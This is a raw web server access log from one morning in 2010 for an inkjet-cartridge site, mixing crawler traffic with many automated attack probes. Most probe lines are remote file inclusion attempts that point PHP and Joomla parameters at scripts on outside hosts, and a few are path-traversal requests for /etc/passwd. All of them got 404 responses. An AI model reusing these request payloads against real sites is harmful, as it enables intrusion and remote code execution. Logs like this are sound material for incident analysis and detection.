208.120.228.43 - - [01/Mar/2010:06:10:51 -0800] "GET / HTTP/1.0" 200 2116 "http://site.inkjetcartridge.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:11:34 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:11:51 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:06:12:04 -0800] "GET /phpbb/viewtopic.php?p=949 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:12:06 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:12:06 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:12:06 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:06:12:14 -0800] "GET /phpbb/viewtopic.php?t=892 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
71.230.249.19 - - [01/Mar/2010:06:12:17 -0800] "GET /email/images/inkmail21_02.gif HTTP/1.0" 200 15159 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.230.249.19 - - [01/Mar/2010:06:12:17 -0800] "GET /email/images/inkmail21_01.gif HTTP/1.0" 200 7485 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.230.249.19 - - [01/Mar/2010:06:12:17 -0800] "GET /email/images/inkmail21_04.gif HTTP/1.0" 200 15283 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
71.230.249.19 - - [01/Mar/2010:06:12:17 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.0" 200 24052 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:06:12:42 -0800] "GET /logs/access_100101.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:12:47 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:12:58 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:15:25 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
220.181.7.28 - - [01/Mar/2010:06:18:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:06:20:08 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:06:20:08 -0800] "GET /links/links19_2.html HTTP/1.0" 200 29325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:06:20:08 -0800] "GET /logs/access.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:06:20:09 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:06:27:37 -0800] "GET /logs/access_100101.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.37 - - [01/Mar/2010:06:29:48 -0800] "GET / HTTP/1.1" 200 2132 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:06:29:51 -0800] "GET /phpbb/viewtopic.php?t=6 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.199.48 - - [01/Mar/2010:06:32:15 -0800] "GET /links/send_password.html HTTP/1.1" 200 6943 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
61.111.3.35 - - [01/Mar/2010:06:34:02 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
61.111.3.35 - - [01/Mar/2010:06:34:03 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
61.111.3.35 - - [01/Mar/2010:06:34:03 -0800] "GET /logs/access.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:06:40:36 -0800] "GET /phpbb/viewtopic.php?t=23 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:06:43:12 -0800] "GET /index.php?rub=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:06:43:12 -0800] "GET /logs//index.php?rub=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:06:43:13 -0800] "GET /index.php?rub=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
195.10.195.144 - - [01/Mar/2010:06:43:13 -0800] "GET /logs//index.php?rub=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:52:03 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.241.177.123 - - [01/Mar/2010:06:53:36 -0800] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "site.inkjetcartridge.com"
212.241.177.123 - - [01/Mar/2010:06:53:36 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:06:54:40 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:06:54:40 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:06:54:40 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:06:55:08 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:06:55:08 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:06:55:08 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:06:57:04 -0800] "GET /boomerang_images/ HTTP/1.0" 200 2358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:57:59 -0800] "GET /logs/access_100101.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:57:59 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:06:57:59 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.43 - - [01/Mar/2010:07:02:45 -0800] "GET /phpbb/viewtopic.php?t=3640 HTTP/1.1" 200 533 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:07:45 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:07:45 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:07:45 -0800] "GET /logs/access.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:08:44 -0800] "GET /phpbb/viewtopic.php?p=3232 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:12:50 -0800] "GET /links/links12_2.html HTTP/1.0" 200 29518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:17:27 -0800] "GET /write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:17:28 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:18:56 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:21:33 -0800] "GET /include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:21:33 -0800] "GET /logs//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:21:33 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:21:34 -0800] "GET /include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:21:34 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:21:34 -0800] "GET /logs//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:07:22:32 -0800] "GET /logs//agenda.php3?rootagenda=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:07:22:32 -0800] "GET /agenda.php3?rootagenda=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:07:22:45 -0800] "GET /logs/scripts.log//agenda.php3?rootagenda=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:07:23:54 -0800] "GET /agenda.php3?rootagenda=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:07:23:54 -0800] "GET /logs//agenda.php3?rootagenda=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:07:23:54 -0800] "GET /logs/scripts.log//agenda.php3?rootagenda=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:26:05 -0800] "GET /phpbb/viewtopic.php?t=492 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
121.152.184.196 - - [01/Mar/2010:07:27:32 -0800] "GET /email/images/inkmail20_05.gif HTTP/1.1" 200 15268 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
121.152.184.196 - - [01/Mar/2010:07:27:32 -0800] "GET /email/images/inkmail20_03.gif HTTP/1.1" 200 14595 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
121.152.184.196 - - [01/Mar/2010:07:27:32 -0800] "GET /email/images/inkmail20_02.gif HTTP/1.1" 200 6519 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
121.152.184.196 - - [01/Mar/2010:07:27:32 -0800] "GET /email/images/inkmail20_01.gif HTTP/1.1" 200 20486 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
121.152.184.196 - - [01/Mar/2010:07:27:33 -0800] "GET /email/images/inkmail20_07.gif HTTP/1.1" 200 17556 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:29:16 -0800] "GET /phpbb/viewtopic.php?p=588 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:29:23 -0800] "GET /logs/access.log//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:07:29:27 -0800] "GET /errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:07:29:27 -0800] "GET /logs/scripts.log//errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:07:29:27 -0800] "GET /logs//errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
174.37.143.198 - - [01/Mar/2010:07:29:30 -0800] "GET /logs/access.log//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:35:19 -0800] "GET /phpbb/viewtopic.php?p=3026 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:37:26 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:37:26 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:37:27 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:41:38 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:41:39 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:07:41:39 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:41:40 -0800] "GET /phpbb/viewtopic.php?p=470 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:07:45:45 -0800] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:07:45:45 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:07:45:45 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
61.111.3.35 - - [01/Mar/2010:07:49:43 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
61.111.3.35 - - [01/Mar/2010:07:49:44 -0800] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
61.111.3.35 - - [01/Mar/2010:07:49:44 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.92.23.144 - - [01/Mar/2010:07:52:10 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.92.23.144 - - [01/Mar/2010:07:52:10 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.92.23.144 - - [01/Mar/2010:07:52:10 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:52:12 -0800] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:52:12 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.55.227.145 - - [01/Mar/2010:07:52:12 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.150.205.156 - - [01/Mar/2010:07:52:27 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "site.inkjetcartridge.com"
219.150.205.156 - - [01/Mar/2010:07:52:27 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "site.inkjetcartridge.com"
219.150.205.155 - - [01/Mar/2010:07:52:27 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:07:55:18 -0800] "GET /phpbb/viewtopic.php?t=2742 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
212.92.23.144 - - [01/Mar/2010:07:58:54 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:08:02:40 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:08:02:40 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:08:02:41 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
